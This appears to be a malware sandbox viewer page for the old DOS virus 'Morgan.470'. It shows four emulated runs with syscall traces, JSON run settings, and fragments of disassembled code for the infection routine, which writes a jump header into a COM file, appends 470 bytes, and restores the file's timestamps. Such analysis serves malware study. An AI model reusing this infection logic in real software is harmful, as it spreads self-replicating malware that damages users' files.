Sample viewer

vx.netlux.org/Virus.DOS.Morgan.470

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:55:03.433009851Z	71	PC: 12ae0 \| Get current directory
2018-12-17T22:55:03.436467518Z	26	PC: 12aff \| Set disk transfer address
2018-12-17T22:55:03.437645244Z	78	PC: 12b09 \| Find first file
2018-12-17T22:55:03.44350277Z	61	PC: 12c1e \| Open file (Filename = 'SLEEP.COM')
2018-12-17T22:55:03.455541688Z	63	PC: 12c2d \| Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:55:03.461924738Z	61	PC: 12b33 \| Open file (Filename = 'SLEEP.COM')
2018-12-17T22:55:03.473669368Z	63	PC: 12b42 \| Read file or device (Read 3 bytes on handle 6)
2018-12-17T22:55:03.480571913Z	66	PC: 12b4d \| Move file pointer
2018-12-17T22:55:03.48286354Z	44	PC: 12b53 \| Get time 0x12b53: inc dl 0x12b55: mov byte ptr [bp + 0x2d9], dl 0x12b59: pushaw 0x12b5a: call 0x22ab4 0x12b5d: popaw 0x12b5e: mov byte ptr [bp + 0x330], 0xe9 0x12b63: mov ax, word ptr [bp + 0x34e] 0x12b67: sub ax, 3 0x12b6a: mov word ptr [bp + 0x331], ax 0x12b6e: mov word ptr [bp + 0x333], 0x60 0x12b74: mov ah, 0x40 0x12b76: mov cx, 4 0x12b79: lea dx, word ptr [bp + 0x330] 0x12b7d: int 0x21 0x12b7f: mov ax, 0x4202 0x12b82: xor cx, cx 0x12b84: xor dx, dx 0x12b86: int 0x21 0x12b88: mov ah, 0x40 0x12b8a: mov cx, 0x1d6
2018-12-17T22:55:03.485029935Z	64	PC: 12b7f \| Write file or device (Write 4 bytes on handle 6)
2018-12-17T22:55:03.487635535Z	66	PC: 12b88 \| Move file pointer
2018-12-17T22:55:03.490354165Z	64	PC: 12b93 \| Write file or device (Write 470 bytes on handle 6)
2018-12-17T22:55:03.504304503Z	42	PC: 12b9c \| Get date 0x12b9c: cmp dx, 0x71a 0x12ba0: je 0x12c01 0x12ba2: cmp dx, 0xc06 0x12ba6: je 0x12c01 0x12ba8: lea dx, word ptr [bp + 0x29f] 0x12bac: mov ah, 0x3b 0x12bae: int 0x21 0x12bb0: jb 0x12bb5 0x12bb2: jmp 0x12aff 0x12bb5: mov ax, 0x5701 0x12bb8: mov dx, word ptr [bp + 0x326] 0x12bbc: mov cx, word ptr [bp + 0x324] 0x12bc0: int 0x21 0x12bc2: mov ah, 0x3e 0x12bc4: int 0x21 0x12bc6: mov ax, 0x4301 0x12bc9: lea dx, word ptr [bp + 0x352] 0x12bcd: xor ch, ch 0x12bcf: mov cl, byte ptr [bp + 0x323] 0x12bd3: int 0x21
2018-12-17T22:55:03.508599216Z	59	PC: 12bb0 \| Change current directory
2018-12-17T22:55:03.513697646Z	87	PC: 12bc2 \| Get or set file date and time
2018-12-17T22:55:03.515179851Z	62	PC: 12bc6 \| Close file
2018-12-17T22:55:03.522760023Z	67	PC: 12bd5 \| Get or set file attributes
2018-12-17T22:55:03.532999614Z	59	PC: 12bdd \| Change current directory
2018-12-17T22:55:03.536358026Z	26	PC: 12be9 \| Set disk transfer address
2018-12-17T22:55:03.537384824Z	9	PC: 12a82 \| Display string (String= 'Goat file (COM). Size=00000064h/0000000100d bytes. ')
2018-12-17T22:55:03.543038147Z	76	PC: 12a86 \| Terminate with return code (Return code = '36')

{"DateBased":true,"Day":26,"Month":7,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11764,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:31:18.964421878Z	71	PC: 12ae0 \| Get current directory
2018-12-25T12:31:18.968110623Z	26	PC: 12aff \| Set disk transfer address
2018-12-25T12:31:18.969437474Z	78	PC: 12b09 \| Find first file
2018-12-25T12:31:18.975523682Z	61	PC: 12c1e \| Open file (Filename = 'SLEEP.COM')
2018-12-25T12:31:18.982715914Z	63	PC: 12c2d \| Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:31:18.990815721Z	61	PC: 12b33 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T12:31:18.997567993Z	63	PC: 12b42 \| Read file or device (Read 3 bytes on handle 6)
2018-12-25T12:31:19.000306079Z	66	PC: 12b4d \| Move file pointer
2018-12-25T12:31:19.002400779Z	44	PC: 12b53 \| Get time 0x12b53: inc dl 0x12b55: mov byte ptr [bp + 0x2d9], dl 0x12b59: pushaw 0x12b5a: call 0x22ab4 0x12b5d: popaw 0x12b5e: mov byte ptr [bp + 0x330], 0xe9 0x12b63: mov ax, word ptr [bp + 0x34e] 0x12b67: sub ax, 3 0x12b6a: mov word ptr [bp + 0x331], ax 0x12b6e: mov word ptr [bp + 0x333], 0x60 0x12b74: mov ah, 0x40 0x12b76: mov cx, 4 0x12b79: lea dx, word ptr [bp + 0x330] 0x12b7d: int 0x21 0x12b7f: mov ax, 0x4202 0x12b82: xor cx, cx 0x12b84: xor dx, dx 0x12b86: int 0x21 0x12b88: mov ah, 0x40 0x12b8a: mov cx, 0x1d6
2018-12-25T12:31:19.004822773Z	64	PC: 12b7f \| Write file or device (Write 4 bytes on handle 6)
2018-12-25T12:31:19.007608572Z	66	PC: 12b88 \| Move file pointer
2018-12-25T12:31:19.010022705Z	64	PC: 12b93 \| Write file or device (Write 470 bytes on handle 6)
2018-12-25T12:31:19.023621574Z	42	PC: 12b9c \| Get date 0x12b9c: cmp dx, 0x71a 0x12ba0: je 0x12c01 0x12ba2: cmp dx, 0xc06 0x12ba6: je 0x12c01 0x12ba8: lea dx, word ptr [bp + 0x29f] 0x12bac: mov ah, 0x3b 0x12bae: int 0x21 0x12bb0: jb 0x12bb5 0x12bb2: jmp 0x12aff 0x12bb5: mov ax, 0x5701 0x12bb8: mov dx, word ptr [bp + 0x326] 0x12bbc: mov cx, word ptr [bp + 0x324] 0x12bc0: int 0x21 0x12bc2: mov ah, 0x3e 0x12bc4: int 0x21 0x12bc6: mov ax, 0x4301 0x12bc9: lea dx, word ptr [bp + 0x352] 0x12bcd: xor ch, ch 0x12bcf: mov cl, byte ptr [bp + 0x323] 0x12bd3: int 0x21
2018-12-25T12:31:19.025627208Z	64	PC: 12c11 \| Write file or device (Write 44 bytes on handle 1)
2018-12-25T12:31:19.030831259Z	87	PC: 12bc2 \| Get or set file date and time
2018-12-25T12:31:19.032652161Z	62	PC: 12bc6 \| Close file
2018-12-25T12:31:19.054795422Z	67	PC: 12bd5 \| Get or set file attributes
2018-12-25T12:31:19.06518064Z	59	PC: 12bdd \| Change current directory
2018-12-25T12:31:19.069083187Z	26	PC: 12be9 \| Set disk transfer address
2018-12-25T12:31:19.070634099Z	9	PC: 12a82 \| Display string (String= 'Goat file (COM). Size=00000064h/0000000100d bytes. ')
2018-12-25T12:31:19.076972073Z	76	PC: 12a86 \| Terminate with return code (Return code = '36')

{"DateBased":true,"Day":6,"Month":12,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11764,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:31:19.104618913Z	71	PC: 12ae0 \| Get current directory
2018-12-25T12:31:19.108222291Z	26	PC: 12aff \| Set disk transfer address
2018-12-25T12:31:19.109759224Z	78	PC: 12b09 \| Find first file
2018-12-25T12:31:19.116546169Z	61	PC: 12c1e \| Open file (Filename = 'SLEEP.COM')
2018-12-25T12:31:19.131590957Z	63	PC: 12c2d \| Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:31:19.139021011Z	61	PC: 12b33 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T12:31:19.147184594Z	63	PC: 12b42 \| Read file or device (Read 3 bytes on handle 6)
2018-12-25T12:31:19.150687717Z	66	PC: 12b4d \| Move file pointer
2018-12-25T12:31:19.155500969Z	44	PC: 12b53 \| Get time 0x12b53: inc dl 0x12b55: mov byte ptr [bp + 0x2d9], dl 0x12b59: pushaw 0x12b5a: call 0x22ab4 0x12b5d: popaw 0x12b5e: mov byte ptr [bp + 0x330], 0xe9 0x12b63: mov ax, word ptr [bp + 0x34e] 0x12b67: sub ax, 3 0x12b6a: mov word ptr [bp + 0x331], ax 0x12b6e: mov word ptr [bp + 0x333], 0x60 0x12b74: mov ah, 0x40 0x12b76: mov cx, 4 0x12b79: lea dx, word ptr [bp + 0x330] 0x12b7d: int 0x21 0x12b7f: mov ax, 0x4202 0x12b82: xor cx, cx 0x12b84: xor dx, dx 0x12b86: int 0x21 0x12b88: mov ah, 0x40 0x12b8a: mov cx, 0x1d6
2018-12-25T12:31:19.158509846Z	64	PC: 12b7f \| Write file or device (Write 4 bytes on handle 6)
2018-12-25T12:31:19.161840014Z	66	PC: 12b88 \| Move file pointer
2018-12-25T12:31:19.164446341Z	64	PC: 12b93 \| Write file or device (Write 470 bytes on handle 6)
2018-12-25T12:31:19.182598054Z	42	PC: 12b9c \| Get date 0x12b9c: cmp dx, 0x71a 0x12ba0: je 0x12c01 0x12ba2: cmp dx, 0xc06 0x12ba6: je 0x12c01 0x12ba8: lea dx, word ptr [bp + 0x29f] 0x12bac: mov ah, 0x3b 0x12bae: int 0x21 0x12bb0: jb 0x12bb5 0x12bb2: jmp 0x12aff 0x12bb5: mov ax, 0x5701 0x12bb8: mov dx, word ptr [bp + 0x326] 0x12bbc: mov cx, word ptr [bp + 0x324] 0x12bc0: int 0x21 0x12bc2: mov ah, 0x3e 0x12bc4: int 0x21 0x12bc6: mov ax, 0x4301 0x12bc9: lea dx, word ptr [bp + 0x352] 0x12bcd: xor ch, ch 0x12bcf: mov cl, byte ptr [bp + 0x323] 0x12bd3: int 0x21
2018-12-25T12:31:19.18506353Z	64	PC: 12c11 \| Write file or device (Write 44 bytes on handle 1)
2018-12-25T12:31:19.196778911Z	87	PC: 12bc2 \| Get or set file date and time
2018-12-25T12:31:19.198771027Z	62	PC: 12bc6 \| Close file
2018-12-25T12:31:19.207440375Z	67	PC: 12bd5 \| Get or set file attributes
2018-12-25T12:31:19.220978547Z	59	PC: 12bdd \| Change current directory
2018-12-25T12:31:19.225062873Z	26	PC: 12be9 \| Set disk transfer address
2018-12-25T12:31:19.226287118Z	9	PC: 12a82 \| Display string (String= 'Goat file (COM). Size=00000064h/0000000100d bytes. ')
2018-12-25T12:31:19.233747161Z	76	PC: 12a86 \| Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11764,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:31:19.244024349Z	71	PC: 12ae0 \| Get current directory
2018-12-25T12:31:19.248725787Z	26	PC: 12aff \| Set disk transfer address
2018-12-25T12:31:19.250427894Z	78	PC: 12b09 \| Find first file
2018-12-25T12:31:19.258284753Z	61	PC: 12c1e \| Open file (Filename = 'SLEEP.COM')
2018-12-25T12:31:19.272250834Z	63	PC: 12c2d \| Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:31:19.280881045Z	61	PC: 12b33 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T12:31:19.288244122Z	63	PC: 12b42 \| Read file or device (Read 3 bytes on handle 6)
2018-12-25T12:31:19.291067756Z	66	PC: 12b4d \| Move file pointer
2018-12-25T12:31:19.294000641Z	44	PC: 12b53 \| Get time 0x12b53: inc dl 0x12b55: mov byte ptr [bp + 0x2d9], dl 0x12b59: pushaw 0x12b5a: call 0x22ab4 0x12b5d: popaw 0x12b5e: mov byte ptr [bp + 0x330], 0xe9 0x12b63: mov ax, word ptr [bp + 0x34e] 0x12b67: sub ax, 3 0x12b6a: mov word ptr [bp + 0x331], ax 0x12b6e: mov word ptr [bp + 0x333], 0x60 0x12b74: mov ah, 0x40 0x12b76: mov cx, 4 0x12b79: lea dx, word ptr [bp + 0x330] 0x12b7d: int 0x21 0x12b7f: mov ax, 0x4202 0x12b82: xor cx, cx 0x12b84: xor dx, dx 0x12b86: int 0x21 0x12b88: mov ah, 0x40 0x12b8a: mov cx, 0x1d6
2018-12-25T12:31:19.29667237Z	64	PC: 12b7f \| Write file or device (Write 4 bytes on handle 6)
2018-12-25T12:31:19.299609286Z	66	PC: 12b88 \| Move file pointer
2018-12-25T12:31:19.302495398Z	64	PC: 12b93 \| Write file or device (Write 470 bytes on handle 6)
2018-12-25T12:31:19.317890938Z	42	PC: 12b9c \| Get date 0x12b9c: cmp dx, 0x71a 0x12ba0: je 0x12c01 0x12ba2: cmp dx, 0xc06 0x12ba6: je 0x12c01 0x12ba8: lea dx, word ptr [bp + 0x29f] 0x12bac: mov ah, 0x3b 0x12bae: int 0x21 0x12bb0: jb 0x12bb5 0x12bb2: jmp 0x12aff 0x12bb5: mov ax, 0x5701 0x12bb8: mov dx, word ptr [bp + 0x326] 0x12bbc: mov cx, word ptr [bp + 0x324] 0x12bc0: int 0x21 0x12bc2: mov ah, 0x3e 0x12bc4: int 0x21 0x12bc6: mov ax, 0x4301 0x12bc9: lea dx, word ptr [bp + 0x352] 0x12bcd: xor ch, ch 0x12bcf: mov cl, byte ptr [bp + 0x323] 0x12bd3: int 0x21
2018-12-25T12:31:19.32038528Z	59	PC: 12bb0 \| Change current directory
2018-12-25T12:31:19.325961688Z	87	PC: 12bc2 \| Get or set file date and time
2018-12-25T12:31:19.328233316Z	62	PC: 12bc6 \| Close file
2018-12-25T12:31:19.337371928Z	67	PC: 12bd5 \| Get or set file attributes
2018-12-25T12:31:19.348529091Z	59	PC: 12bdd \| Change current directory
2018-12-25T12:31:19.353773717Z	26	PC: 12be9 \| Set disk transfer address
2018-12-25T12:31:19.355467461Z	9	PC: 12a82 \| Display string (String= 'Goat file (COM). Size=00000064h/0000000100d bytes. ')
2018-12-25T12:31:19.361480606Z	76	PC: 12a86 \| Terminate with return code (Return code = '36')